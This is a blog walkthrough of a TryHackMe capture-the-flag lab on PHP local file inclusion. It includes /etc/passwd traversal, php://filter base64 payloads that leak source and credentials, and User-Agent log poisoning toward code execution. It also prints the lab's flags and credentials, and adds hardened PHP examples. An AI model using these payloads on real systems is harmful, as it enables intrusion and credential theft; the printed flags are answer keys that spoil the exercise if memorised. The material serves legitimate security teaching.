Get started with Cyber Security in 25 days, by learning the
basics and completing a new, beginner friendly security exercise every day
leading up until Christmas; an advent calendar but with security challenges
and not chocolate.
Hey guys! Sorry for the delay, but we are back with Day 6 of the "Advent of Cyber" event by TryHackMe. If you haven't solved the Day 5 challenge, click here.
This challenge is again based on Web Exploitation, and the task is named "Patch Management is Hard".
DAY 6
Story
During a routine security audit before the Incident, McSkidy discovered some recovery passwords on an old server. She created a ticket to decommission this server to reduce this security vulnerability. The Elf assigned to fix this vulnerability kept pushing off the task, and it never got done. Luckily, some of those recovery keys can be used to save some systems.
Unfortunately, the only way to access the server is through an old web application. See if you can pull out those recovery keys to help McSkidy in her pursuit to save Christmas.
Learning Objectives of the day
- What is LFI?
- How to perform LFI?
- How to elevate from LFI to RCE?
Let us understand the concepts targeted for today first!
What is LFI?
LFI (Local File Inclusion) vulnerabilities are found in many web applications. In PHP, for example, the following functions introduce this kind of vulnerability when the path they are given is controlled by the user:
- include
- require
- include_once
- require_once
It is a web application vulnerability that allows an attacker to include and read local files on the server. These files could contain sensitive data such as cryptographic keys, databases that contain passwords, and other private data.
An LFI vulnerability usually stems from a developer's lack of security awareness. In some cases, developers need to include the content of other local files within a specific page. If a developer builds the include path from user input without proper validation, an LFI vulnerability exists: a developer should never trust user input, and every value coming from a user should be filtered and sanitised. The root cause of these vulnerabilities is missing input validation: the user controls the value, and it is neither sanitised nor validated before it is used.
You should read the content given with the challenge for the best understanding of LFI.
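To make the "include without validation" point concrete, here is an added example (not code from the TryHackMe room or the original post) of an error-page include like the one behind the room's err parameter, first written the vulnerable way and then with an allowlist and a directory-confinement check. The parameter name, the page keys and the errors/ directory are assumptions for illustration.

```php
<?php
// Added example, not code from the TryHackMe room or the original post: an
// error-page include like the one behind the room's "err" parameter, shown
// unsafe and then allowlisted. Names, keys and the errors/ directory are assumed.

// UNSAFE: the request value is the include path, so any file, traversal
// sequence or stream wrapper the client sends is honoured as written.
function render_error_unsafe(string $err): void
{
    include $err;
}

// SAFE: a short key selects one of a fixed set of files; unknown keys fall back
// to the default, so no path, traversal or stream wrapper reaches include().
const ERROR_PAGES = [
    'error'    => __DIR__ . '/errors/error.txt',
    'notfound' => __DIR__ . '/errors/notfound.txt',
];

function resolve_error_page(?string $err): string
{
    $key = strtolower(trim((string) $err));
    return ERROR_PAGES[$key] ?? ERROR_PAGES['error'];
}

function render_error_safe(?string $err): void
{
    // The page is read as data and HTML-escaped; it is never executed.
    $body = @file_get_contents(resolve_error_page($err));
    echo htmlspecialchars($body === false ? 'Unknown error.' : $body, ENT_QUOTES, 'UTF-8');
}

// When a file name really must be dynamic, confine it instead of trusting it:
// basename() drops any directory part, realpath() returns false for missing
// files and for wrappers such as php://filter, and the prefix check rejects
// anything (a symlink, say) that still resolves outside $baseDir.
function confine_to_dir(string $name, string $baseDir): ?string
{
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . basename($name));
    if ($base === false || $real === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed inputs: each hostile value maps to the default page and to null.
$inputs = ['/etc/passwd', '../../etc/flag', 'php://filter/convert.base64-encode/resource=index.php'];
foreach ($inputs as $in) {
    printf("%-55s -> %s | %s\n", $in, basename(resolve_error_page($in)), var_export(confine_to_dir($in, __DIR__), true));
}
```

Run it with `php` from any directory: the allowlist answers every hostile value with error.txt, and confine_to_dir() returns null for all three because nothing resolves to a real file inside the script's own directory.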
Q1. Deploy the attached VM and look around. What is the entry point for our web application?
Answer:- err
Q2. Use the entry point to perform LFI to read the /etc/flag file. What is the flag?
We first go to our entry point and replace the error.txt file name with '/etc/passwd', just to check whether we can read it:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false
Yes, we have access, but normally we shouldn't have that!
Now we check for /etc/flag, and voila!
Answer:- THM{d29e08941cf7fe41df55f1a7da6c4c06}
Q3. Use the PHP filter technique to read the source code of index.php. What is the $flag variable's value?
We use the PHP filter technique to read the code of index.php by prefixing the file name with:
php://filter/convert.base64-encode/resource=
https://10-10-247-133.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=index.php
Once we have the base64 encoding of the file, we go to https://www.base64decode.org/ and decode it for our answer!
Or you can use the base64 command in a terminal:
echo "<base64 string>" | base64 -d
Answer:- THM{791d43d46018a0d89361dbf60d5d9eb8}
Q4. McSkidy forgot his login credential. Can you help him to log in, in order to recover one of the server's passwords?
Now that you have read index.php, there is a path to the PHP file holding the login credentials. Use the PHP filter technique to read its content. What are the username and password?
Using the same base64 decoding of the index.php file, we also see that there is ./includes/creds.php, which holds the credentials.
https://10-10-231-193.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php
We do the same process, using the PHP filter technique on this file and then decoding it, and get the credentials!
Answer:- McSkidy:A0C315Aw3s0m
Q5. Use the credentials to log in to the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?
We have the username and password; we log in and see a few options!
We know we have to recover the password, so we go to Password Recovery.
Answer:- THM{552f313b52e3c3dbf5257d8c6db7f6f1}
Q6. The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.
We send a curl request in order to test the logs and see how a request shows up:
curl -A "TESTIN TESTING" http://10-10-88-123.p.thmlabs.com/login.php
The "-A" option lets us set the User-Agent header, and we see TESTIN TESTING as the user agent in the log.
Now we do the same, but with a little PHP payload in the User-Agent that displays the phpinfo!
To check the log file we need to go to "./includes/logs/app_access.log", but for that we need to go to another window where we are not logged in to actually check it!
And we see the phpinfo output in the logs!!!!!
We can see the hostname directly in the phpinfo output, in the System entry.
Answer:- lfi-aoc-awesome-59aedca683fff9261263bb084880c965
The question does ask for RCE, but this task can be completed without RCE!
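The log-poisoning step above works because two things line up: the raw User-Agent is written into the log, and the log file is later handed to include() through the LFI. As an added example (not code from the room or the original post), here is a logger and a log-viewer page that break both links. The log path, the line format and the request fields are assumptions.

```php
<?php
// Added example, not code from the TryHackMe room or the original post. The
// Q6 chain needs the raw User-Agent in the log and the log file passed to
// include() through the LFI; this logger and viewer remove both. The log
// path and the line format are assumptions.

const LOG_FILE = __DIR__ . '/app_access.log';

// 1. Store untrusted request data in a form PHP can never parse as code:
//    printable ASCII only, angle brackets written out as \x3C and \x3E so a
//    PHP open tag cannot be stored, and a length cap so one request cannot
//    flood the file.
function sanitise_for_log(string $value, int $max = 200): string
{
    $value = preg_replace('/[^\x20-\x7E]/', '?', $value) ?? '';
    $value = str_replace(['<', '>'], ['\\x3C', '\\x3E'], $value);
    return substr($value, 0, $max);
}

function log_request(string $ip, string $method, string $uri, string $userAgent): string
{
    $line = sprintf("%s %s %s %s \"%s\"\n", gmdate('c'), $ip, $method,
                    sanitise_for_log($uri), sanitise_for_log($userAgent));
    file_put_contents(LOG_FILE, $line, FILE_APPEND | LOCK_EX);
    return $line;
}

// UNSAFE viewer: any PHP tag that reached the log now runs as the web server
// user. This is exactly what the LFI does when it is pointed at the log file.
function render_log_unsafe(): void
{
    include LOG_FILE;
}

// SAFE viewer: the file is read as text and HTML-escaped. file_get_contents()
// never evaluates what it reads, whatever the file contains.
function render_log(): string
{
    $text = @file_get_contents(LOG_FILE);
    return '<pre>' . htmlspecialchars($text === false ? '' : $text, ENT_QUOTES, 'UTF-8') . '</pre>';
}

// Constructed request with a PHP tag in the User-Agent, as in the room's
// phpinfo trick: the stored line no longer contains a "<?" sequence.
$stored = log_request('10.0.0.5', 'GET', '/login.php?err=error.txt', '<?php phpinfo(); ?>');
echo $stored, render_log();
```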
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or incite any illegal activity or hacking.